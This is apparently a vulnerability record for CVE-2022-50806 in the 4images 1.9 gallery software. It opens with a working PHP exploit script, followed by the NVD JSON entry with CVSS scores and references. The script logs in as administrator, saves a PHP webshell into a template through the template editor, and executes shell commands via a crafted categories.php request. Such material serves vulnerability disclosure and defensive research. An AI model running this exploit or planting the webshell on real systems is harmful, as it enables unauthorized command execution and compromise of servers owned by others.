CVE-2022-50806

<?php // CVE-2022-50806 PoC - 4images 1.9 Remote Command Execution // Requirements: Valid administrator credentials $target = 'http://target.com/4images/'; // Target URL $admin_path = 'admin/templates.php'; // Admin template management $username = 'admin'; $password = 'admin123'; // Step 1: Login as administrator $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target . 'login.php'); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "action=login&username=" . urlencode($username) . "&password=" . urlencode($password)); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_exec($ch); // Step 2: Inject malicious code via template editor $malicious_code = '<?php system($_GET["cmd"]); ?>'; // Simple webshell $template_data = array( 'action' => 'savetemplate', 'template_name' => 'categories.html', 'template_content' => $malicious_code ); curl_setopt($ch, CURLOPT_URL, $target . $admin_path); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($template_data)); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt'); curl_exec($ch); // Step 3: Execute commands via crafted cat_id parameter $cmd = 'whoami'; // Command to execute curl_setopt($ch, CURLOPT_URL, $target . 'categories.php?cat_id=1&cmd=' . urlencode($cmd)); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt'); $output = curl_exec($ch); echo "Command output: " . $output; curl_close($ch); ?>

{"cve": {"id": "CVE-2022-50806", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:49.830", "lastModified": "2026-02-02T16:16:15.467", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "4images 1.9 contains a remote command execution vulnerability that allows authenticated administrators to inject reverse shell code through template editing functionality. Attackers can save malicious code in the template and execute arbitrary commands by accessing a specific categories.php endpoint with a crafted cat_id parameter."}, {"lang": "es", "value": "4images 1.9 contiene una vulnerabilidad de ejecución remota de comandos que permite a los administradores autenticados inyectar código de shell inverso a través de la funcionalidad de edición de plantillas. Los atacantes pueden guardar código malicioso en la plantilla y ejecutar comandos arbitrarios al acceder a un endpoint específico categories.php con un parámetro cat_id manipulado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:4homepages:4images:1.9:*:*:*:*:*:*:*", "matchCriteriaId": "2689DA94-EA0E-4988-866D-F6494DA44F50"}]}]}], "references": [{"url": "https://www.4homepages.de/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51147", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/images-remote-command-execution-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}